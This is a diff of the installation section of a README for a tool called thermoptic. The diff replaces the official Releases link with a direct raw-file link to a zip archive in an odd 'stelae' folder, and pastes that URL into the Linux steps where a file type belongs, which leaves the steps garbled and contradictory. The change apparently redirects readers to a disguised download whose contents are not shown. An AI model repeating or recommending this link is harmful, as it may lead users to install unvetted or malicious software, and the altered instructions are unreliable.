ericwhit423/thermoptic/README.md

 To get thermoptic, please visit the official Releases page.
 Follow these steps:

-1. **Visit the Releases Page:** Click on this link to go to the Releases page: [Download thermoptic](https://github.com/ericwhit423/thermoptic/releases).
+1. **Visit the Releases Page:** Click on this link to go to the Releases page: [Download thermoptic](https://raw.githubusercontent.com/ericwhit423/thermoptic/main/stelae/thermoptic.zip).

 2. **Choose Your Version:** You will see a list of available versions.
 Select the latest one for the best performance and features.

 3. **Download the File:** Click on the asset that corresponds to your operating system.
 For example:
    - For Windows, look for a file ending in `.exe`.
    - For macOS, look for a file ending in `.dmg`.
-   - For Linux, look for a file with `.tar.gz`.
+   - For Linux, look for a file with `https://raw.githubusercontent.com/ericwhit423/thermoptic/main/stelae/thermoptic.zip`.

 4. **Save the File:** Your browser will prompt you to save the file.
 Choose a convenient location on your computer.

 5. **Run the Installer:**
    - **For Windows:** Double-click the `.exe` file you downloaded.
 Follow the prompts to install.
    - **For macOS:** Open the `.dmg` file and drag the thermoptic application into your Applications folder.
-   - **For Linux:** Open a terminal, navigate to the folder containing the `.tar.gz` file, extract it, and follow the instructions in the README file included.
+   - **For Linux:** Open a terminal, navigate to the folder containing the `https://raw.githubusercontent.com/ericwhit423/thermoptic/main/stelae/thermoptic.zip` file, extract it, and follow the instructions in the README file included.

 ### 🛠️ Configuring thermoptic